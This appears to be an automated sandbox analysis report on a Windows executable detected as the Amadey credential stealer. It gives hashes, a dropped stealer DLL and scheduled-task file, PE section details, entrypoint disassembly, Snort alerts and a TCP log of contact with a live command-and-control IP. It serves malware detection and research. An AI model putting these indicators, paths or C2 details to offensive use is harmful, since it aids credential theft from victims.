                                                                                                    SHA-256:3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                                                                                    SHA-512:1EB7F126DCCC88A2479E3818C36120F5AF3CAA0D632B9EA803485EE6531D6E2A1FD0805B1C4364983D280DF23EA5CA3AD4A5FCA558AC436EFAE36AF9B795C444
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                    • Antivirus: Virustotal, Detection: 78%, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d...i..e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                                    C:\Windows\Tasks\explorha.job

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):288
                                                                                                    Entropy (8bit):3.3985817340273097
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:DzX4RKUEZ+lX1y6y2l+lRdtPjgsW2YRZuy0lt/uut0:f4RKQ1y6NkDHjzvYRQVBt0
                                                                                                    MD5:82D864F71511B4574815CA0483C7F965
                                                                                                    SHA1:83AF63AE4639CC61C69B94D67A424158B753758E
                                                                                                    SHA-256:58E6D87F8BA41D0333C3FF73A54F409539061D1C6F6532E412795D7105D1E20B
                                                                                                    SHA-512:DB7D6D669499BD37847581110B4764FBA4E3A426ED3658AED87B3360C3CFBF6C7C656FCF42D60C41A6B181DA814F0F2B98910F5AC66761F283E8FC2167E65229
                                                                                                    Malicious:false
                                                                                                    Preview:....].X.I.aC.I.D.d.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.9.f.d.8.5.1.a.4.f.\.e.x.p.l.o.r.h.a...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.5934833981591465
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    File size:3'010'048 bytes
                                                                                                    MD5:6afd3b5b7effe4bb0500fe08dd1f6ed7
                                                                                                    SHA1:c0b8d6e8b660aa79851bd237c162ed437d3c047c
                                                                                                    SHA256:441adf73dcc0324843d1e42824e7e9473960c859c748a87ac7af4460535aaf2f
                                                                                                    SHA512:da0d387d54151a95993cf4f2af96202d68403e09bd338a3182108ec3150fd06bd565a1be1af82481acc6bded5d8e4df05e029ee89622e410e52e3ccf611c96d6
                                                                                                    SSDEEP:49152:uSB7N+K2oIqvjWi3wkCL2SnvSiGQbiF31ZPGSus4Fmh:jB7N+K2oIqn3jCqGSHmiF31dGSJaC
                                                                                                    TLSH:0BD53B51B505B3CBD88E17788627CEC59C5D03B957100AD3A87CA5BABE63CC927F6C28
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L..

                                                                                                    File Icon

                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x719000
                                                                                                    Entrypoint Section:.taggant
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x65E4126F [Sun Mar 3 06:02:23 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp 00007F449C898BFAh
                                                                                                    bswap esp
                                                                                                    sub eax, 00000000h
                                                                                                    add cl, ch
                                                                                                    add byte ptr [eax], ah
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [edi], al
                                                                                                    or al, byte ptr [eax]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], dh
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [edx], ah
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [edx], cl
                                                                                                    or al, byte ptr [eax]
                                                                                                    add byte ptr [ecx], cl
                                                                                                    or al, byte ptr [eax]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax+eax*4], cl
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    adc byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    pop es
                                                                                                    or al, byte ptr [eax]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0560x6a.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3177080x10qatcqnjl
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x3176b80x18qatcqnjl
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    0x10000x680000x2ea0043193df2ce84e9bcc4beed8ab2540838False0.9981358914209115data7.982348024472177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x690000x1e00x20012eed034bda0720160281fe0e21c3acdFalse0.580078125data4.521170698244857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .idata 0x6a0000x10000x20017662c92043abde8b4b3074dcc401ca6False0.1484375data1.0249469107790772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    qatcqnjl0x6b0000x2ad0000x2aca00edc4095cef7156abadb967fad510a923unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    zabsvnpb0x3180000x10000x400cb767287f5d0e687cd9747fcdf4fb490False0.8095703125data6.358319582684511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .taggant0x3190000x30000x220051733941ad0bca5ffca8ce865ec10fc3False0.06158088235294118DOS executable (COM)0.7638928624802979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_MANIFEST0x3177180x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    kernel32.dlllstrcpy

                                                                                                    Possible Origin

                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States

                                                                                                    Network Behavior

                                                                                                    Snort IDS Alerts

                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                    04/19/24-04:26:07.803129TCP2855239ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST)4974280192.168.2.4193.233.132.56
                                                                                                    04/19/24-04:26:03.920797TCP2856147ETPRO TROJAN Amadey CnC Activity M34973580192.168.2.4193.233.132.56
                                                                                                    04/19/24-04:26:08.422562TCP2856151ETPRO TROJAN Amadey CnC Activity M74974480192.168.2.4193.233.132.56

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Apr 19, 2024 04:26:03.675621986 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:03.675685883 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:03.920357943 CEST8049735193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:03.920675039 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:03.920797110 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:03.924227953 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:03.924307108 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:03.924387932 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.165211916 CEST8049735193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.165822029 CEST8049735193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.165978909 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.167273998 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.172894955 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173118114 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173166990 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173183918 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173206091 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173213005 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173252106 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173252106 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173294067 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173295975 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173331976 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173342943 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173372984 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173378944 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173414946 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173425913 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173455000 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173470020 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173497915 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.173501968 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173549891 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.411830902 CEST8049735193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.416256905 CEST8049735193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.416465998 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422019005 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422082901 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422100067 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422123909 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422130108 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422164917 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422169924 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422205925 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422210932 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422249079 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422250986 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422291994 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422292948 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422333002 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422342062 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422375917 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422382116 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422415018 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422420025 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422456026 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422466993 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422494888 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422502041 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422595024 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422604084 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422635078 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422643900 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422676086 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422688007 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422714949 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422725916 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422755003 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422763109 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422794104 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422800064 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422833920 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422841072 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422874928 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.422884941 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.422920942 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.519233942 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.519393921 CEST4973780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671367884 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671432972 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671438932 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671473026 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671478033 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671514988 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671519041 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671559095 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671562910 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671597958 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671602964 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671637058 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671657085 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671674967 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671679020 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671713114 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671719074 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671758890 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671783924 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671822071 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671823978 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671859980 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671866894 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671900034 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671909094 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671941996 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671947956 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.671982050 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.671993017 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672025919 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672030926 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672065973 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672074080 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672111988 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672178030 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672218084 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672224998 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672264099 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672276020 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672312975 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672318935 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672353029 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672362089 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672390938 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672400951 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672430038 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672434092 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672467947 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672475100 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672507048 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672512054 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672545910 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672553062 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672585011 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672589064 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672625065 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672631025 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672665119 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672668934 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672704935 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672710896 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672744989 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672749996 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672785997 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672789097 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672823906 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672828913 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672863960 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672869921 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672900915 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672907114 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672941923 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672946930 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672976017 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672980070 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.673023939 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.673028946 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.673063040 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.673070908 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.673110962 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.763921022 CEST8049735193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.764107943 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.765613079 CEST8049737193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.765682936 CEST4973780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.765908003 CEST4973780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922132015 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922174931 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922193050 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922214031 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922233105 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922251940 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922270060 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922286987 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922308922 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922339916 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922354937 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922373056 CEST8049736193.233.132.56192.168.2.4
